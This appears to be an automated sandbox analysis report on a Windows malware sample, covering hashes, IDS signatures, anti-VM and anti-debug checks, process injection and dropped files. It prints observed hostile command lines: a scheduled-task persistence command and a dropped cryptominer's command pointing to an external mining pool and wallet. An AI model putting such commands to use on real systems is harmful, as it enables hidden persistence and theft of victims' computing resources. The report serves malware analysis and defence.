Analysis
- max time kernel: 149s
- max time network: 146s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 27-07-2021 03:08
Static task: static1
Behavioral task: behavioral1
- Sample: 2b54ccc44e89581b1005e8b6f24a7822.exe
- Resource: win7v20210410
General
- Target: 2b54ccc44e89581b1005e8b6f24a7822.exe
- Size: 4.6MB
- MD5: 2b54ccc44e89581b1005e8b6f24a7822
- SHA1: d7de533078a3d1204e1a0c9440501928e0cf1285
- SHA256: aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
- SHA512: c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
Malware Config
Signatures
- suricata: ET MALWARE Generic gate[.].php GET with minimal headers
- suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
- Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
- Executes dropped EXE 3 IoCs
  Processes:
    pid   process
    392   MicrosoftApi.exe
    360   MicrosoftApi.exe
    1084  MRBKYMNOAdmine.exe
-
  Processes:
    resource                                                      yara_rule
    \Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe    upx
    C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe  upx
- Checks BIOS information in registry 2 TTPs 6 IoCs
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                              process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  MicrosoftApi.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   MicrosoftApi.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  MicrosoftApi.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   MicrosoftApi.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  2b54ccc44e89581b1005e8b6f24a7822.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   2b54ccc44e89581b1005e8b6f24a7822.exe
- Loads dropped DLL 2 IoCs
  Processes:
    pid   process
    1072  2b54ccc44e89581b1005e8b6f24a7822.exe
    360   MicrosoftApi.exe
-
  Processes:
    resource                                                                      yara_rule
    behavioral1/memory/1072-61-0x000000013FEA0000-0x000000013FEA1000-memory.dmp  themida
    \Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe                      themida
    C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe                    themida
    behavioral1/memory/392-72-0x000000013F080000-0x000000013F081000-memory.dmp   themida
    C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe                    themida
    behavioral1/memory/360-82-0x000000013FF60000-0x000000013FF61000-memory.dmp   themida
-
  Processes:
    description        ioc                                                                                process
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  2b54ccc44e89581b1005e8b6f24a7822.exe
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  MicrosoftApi.exe
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  MicrosoftApi.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  Processes:
    pid   process
    1072  2b54ccc44e89581b1005e8b6f24a7822.exe
    392   MicrosoftApi.exe
    360   MicrosoftApi.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) 1 TTPs 1 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Delays execution with timeout.exe 1 IoCs
  Processes:
    pid   process
    924   timeout.exe
- Suspicious behavior: EnumeratesProcesses 64 IoCs
  Processes:
    pid   process
    360   MicrosoftApi.exe  (the same entry is listed 64 times)
- Suspicious use of AdjustPrivilegeToken 1 IoCs
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  360   MicrosoftApi.exe
- Suspicious use of WriteProcessMemory 18 IoCs
  Processes (each row is listed 3 times in the report):
    description                          pid   process                               target process
    PID 1072 wrote to memory of 392      1072  2b54ccc44e89581b1005e8b6f24a7822.exe  MicrosoftApi.exe
    PID 392 wrote to memory of 664       392   MicrosoftApi.exe                      cmd.exe
    PID 664 wrote to memory of 924       664   cmd.exe                               timeout.exe
    PID 664 wrote to memory of 848       664   cmd.exe                               schtasks.exe
    PID 1864 wrote to memory of 360      1864  taskeng.exe                           MicrosoftApi.exe
    PID 360 wrote to memory of 1084      360   MicrosoftApi.exe                      MRBKYMNOAdmine.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\2b54ccc44e89581b1005e8b6f24a7822.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\2b54ccc44e89581b1005e8b6f24a7822.exe"
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
    command line: "C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC56.tmp.cmd""
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\timeout.exe
        command line: timeout 4
        - Delays execution with timeout.exe
      - C:\Windows\system32\schtasks.exe
        command line: schtasks.exe /create /f /sc MINUTE /mo 1 /tn "MicrosoftApi" /tr "'C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe"'
        - Creates scheduled task(s)
- C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {CE79554E-3DC8-4DC3-BA1E-35F76C3A9250} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
    command line: C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe
      command line: "C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe" --algo kawpow --server rvn.2miners.com:6060 --user RC1rszoXopQ8E24icWrqSRE8xCdsMXcWzw.Bv2 -w 0
      - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmpAC56.tmp.cmd
  MD5: 63bab368a9ce36f0507fe97329e0ab20
  SHA1: baccbe6de18b588046cf3001526d3f27a8ca91d7
  SHA256: 2015c77c2b3aa5dc3093e6855c8f882cae9d40e7087e1013a45e4df6dab9e158
  SHA512: 25c726d318ad3e1ce8f8a1d8f898cb8e2b76de3998ec695f2e26b3ded6fbdb29e673d32c35d3d1773cf142e6b9cea425090b4b9af2596ae32ae7424e27334356
- C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe
  MD5: 48e6d7bd626e9d7c0192eba46918a870
  SHA1: 5327b24d898ea440c404a6384d9dad2de80e74d4
  SHA256: 28484d217bf08c05dba373b6dada80f4a3812b1fc5820ab6ca2f09d5456671ee
  SHA512: 6625aba02ef85a919328d83c3b672ad0328f9529f702a850a9420ccfad48d811e4c73811602c91f375ca66f4e48438d970b3549a7fd94d5a801aba4b6cd91c5a
- C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
  MD5: 2b54ccc44e89581b1005e8b6f24a7822
  SHA1: d7de533078a3d1204e1a0c9440501928e0cf1285
  SHA256: aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
  SHA512: c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
- C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
  MD5: 2b54ccc44e89581b1005e8b6f24a7822
  SHA1: d7de533078a3d1204e1a0c9440501928e0cf1285
  SHA256: aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
  SHA512: c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
- \Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe
  MD5: 48e6d7bd626e9d7c0192eba46918a870
  SHA1: 5327b24d898ea440c404a6384d9dad2de80e74d4
  SHA256: 28484d217bf08c05dba373b6dada80f4a3812b1fc5820ab6ca2f09d5456671ee
  SHA512: 6625aba02ef85a919328d83c3b672ad0328f9529f702a850a9420ccfad48d811e4c73811602c91f375ca66f4e48438d970b3549a7fd94d5a801aba4b6cd91c5a
- \Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe
  MD5: 2b54ccc44e89581b1005e8b6f24a7822
  SHA1: d7de533078a3d1204e1a0c9440501928e0cf1285
  SHA256: aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
  SHA512: c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
- memory/360-85-0x000007FE80010000-0x000007FE80011000-memory.dmp
  Filesize: 4KB
- memory/360-86-0x000000001C1A0000-0x000000001C1A2000-memory.dmp
  Filesize: 8KB
- memory/360-84-0x0000000000070000-0x0000000000071000-memory.dmp
  Filesize: 4KB
- memory/360-79-0x0000000000000000-mapping.dmp
- memory/360-82-0x000000013FF60000-0x000000013FF61000-memory.dmp
  Filesize: 4KB
- memory/392-69-0x00000000005F0000-0x00000000005F1000-memory.dmp
  Filesize: 4KB
- memory/392-70-0x000007FE80010000-0x000007FE80011000-memory.dmp
  Filesize: 4KB
- memory/392-72-0x000000013F080000-0x000000013F081000-memory.dmp
  Filesize: 4KB
- memory/392-77-0x0000000000600000-0x0000000000601000-memory.dmp
  Filesize: 4KB
- memory/392-66-0x0000000000000000-mapping.dmp
- memory/664-74-0x0000000000000000-mapping.dmp
- memory/848-78-0x0000000000000000-mapping.dmp
- memory/924-76-0x0000000000000000-mapping.dmp
- memory/1072-61-0x000000013FEA0000-0x000000013FEA1000-memory.dmp
  Filesize: 4KB
- memory/1072-68-0x0000000000080000-0x0000000000081000-memory.dmp
  Filesize: 4KB
- memory/1072-64-0x000007FE80010000-0x000007FE80011000-memory.dmp
  Filesize: 4KB
- memory/1072-63-0x0000000000070000-0x0000000000071000-memory.dmp
  Filesize: 4KB
- memory/1084-88-0x0000000000000000-mapping.dmp